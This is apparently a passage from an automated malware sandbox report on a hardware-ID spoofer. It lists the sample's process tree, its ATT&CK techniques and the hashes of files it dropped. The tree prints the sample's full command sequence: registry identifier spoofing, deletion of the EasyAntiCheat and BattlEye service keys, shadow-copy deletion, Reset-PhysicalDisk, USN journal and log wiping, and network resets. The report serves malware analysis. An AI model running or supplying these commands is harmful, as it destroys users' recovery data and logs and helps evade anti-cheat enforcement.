    - Enumerates system info in registry
    - Modifies registry key
    PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:2024
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:2356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1516
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t reg_SZ /d {1098321251-1005132058-662625648} /f
    3⤵
    - Modifies registry key
    PID:596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2256
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2988
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t reg_SZ /d%random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2996
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t reg_SZ /d1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3000
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4172
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4476
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:2980
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:2172
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:520
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:512
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3660
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:1012
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:2804
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4608
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4940
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t reg_BINARY /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4764
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t reg_BINARY /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t reg_BINARY /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4644
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t reg_BINARY /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f
  2⤵
  PID:4228
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {1098321251-1005132058-662625648} /f
    3⤵
    - Modifies registry key
    PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f
  2⤵
  PID:5048
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t reg_SZ /d {1098321251-1005132058-662625648} /f
    3⤵
    - Modifies registry key
    PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\MountedDevices /f
  2⤵
  PID:5084
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
  2⤵
  PID:504
- - C:\Windows\system32\reg.exe
    reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
  2⤵
  PID:2716
- - C:\Windows\system32\reg.exe
    reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    - Modifies registry key
    PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
  2⤵
  PID:1912
- - C:\Windows\system32\reg.exe
    reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    - Modifies registry key
    PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
  2⤵
  PID:4244
- - C:\Windows\system32\reg.exe
    reg DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    - Modifies registry key
    PID:376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
  2⤵
  PID:4944
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    - Modifies registry key
    PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
  2⤵
  PID:992
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    - Modifies registry key
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
  2⤵
  PID:4344
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v registersData /f
  2⤵
  PID:2592
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v registersData /f
    3⤵
    - Modifies registry key
    PID:3772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
  2⤵
  PID:2984
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    - Modifies registry key
    PID:700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
  2⤵
  PID:352
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    - Modifies registry key
    PID:64
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
  2⤵
  PID:3848
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    - Modifies registry key
    PID:164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
  2⤵
  PID:4132
- - C:\Windows\system32\reg.exe
    reg DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    - Modifies registry key
    PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net start winmgmt /y >nul
  2⤵
  PID:3672
- - C:\Windows\system32\net.exe
    net start winmgmt /y
    3⤵
    PID:1712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start winmgmt /y
      4⤵
      PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ipconfig /flushdns >nul
  2⤵
  PID:2992
- - C:\Windows\system32\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int reset all >nul
  2⤵
  PID:3980
- - C:\Windows\system32\netsh.exe
    netsh int reset all
    3⤵
    PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int ipv4 reset >nul
  2⤵
  PID:788
- - C:\Windows\system32\netsh.exe
    netsh int ipv4 reset
    3⤵
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh int ipv6 reset >nul
  2⤵
  PID:3708
- - C:\Windows\system32\netsh.exe
    netsh int ipv6 reset
    3⤵
    PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh winsock reset >nul
  2⤵
  PID:5000
- - C:\Windows\system32\netsh.exe
    netsh winsock reset
    3⤵
    PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell vssadmin delete shadows /all >nul
  2⤵
  PID:4660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell vssadmin delete shadows /all
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3108
  - - C:\Windows\system32\vssadmin.exe
      "C:\Windows\system32\vssadmin.exe" delete shadows /all
      4⤵
      Interacts with shadow copies
      PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell Reset-PhysicalDisk * >nul
  2⤵
  PID:2312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Reset-PhysicalDisk *
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n C: >nul
  2⤵
  PID:5048
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n C:
    3⤵
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n D: >nul
  2⤵
  PID:4144
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n D:
    3⤵
    - Enumerates connected drives
    PID:508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n E: >nul
  2⤵
  PID:2644
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n E:
    3⤵
    - Enumerates connected drives
    PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n F: >nul
  2⤵
  PID:2972
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /n F:
    3⤵
    - Enumerates connected drives
    PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\System32\restore\MachineGuid.txt >nul
  2⤵
  PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\IndexerVolumeGuid >nul
  2⤵
  PID:832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\tracking.log >nul
  2⤵
  PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.dev.log >nul
  2⤵
  PID:376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.setup.log >nul
  2⤵
  PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp >nul
  2⤵
  PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp >nul
  2⤵
  PID:992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch >nul
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Solution.exe >nul
  2⤵
  PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Solution64.sys >nul
  2⤵
  PID:2744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Disk1.exe >nul
  2⤵
  PID:776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Disk2.exe >nul
  2⤵
  PID:3772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Mac.bat >nul
  2⤵
  PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3508

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3b4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Drops file in System32 directory
PID:3004

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4c4a2aa3380856eb4e8780992f5d2736

SHA1
e746289381acdf2875e9e00fbb33f3af27a9b443

SHA256
da92b0663439b9a18485e360dc65c8e4f07aaeae2212be2cabbd1b6f6f8d055b

SHA512
300d2362ab3ecc95d1146c9fb9f91a2144dc9314bfe469a1234b044d79b5703f5a92a22ed329916ad9923928b492a7bfd300a67a36c46f37b81189e3ca29ed2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hd43bps3.ouo.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/3108-7-0x00000183F7C00000-0x00000183F7C22000-memory.dmp

Filesize
136KB

Download
memory/3108-10-0x00000183F7ED0000-0x00000183F7F46000-memory.dmp

Filesize
472KB

Download
memory/4772-376-0x000001B2B4210000-0x000001B2B423A000-memory.dmp

Filesize
168KB

Download
memory/4772-395-0x000001B2B4210000-0x000001B2B4232000-memory.dmp

Filesize
136KB

Download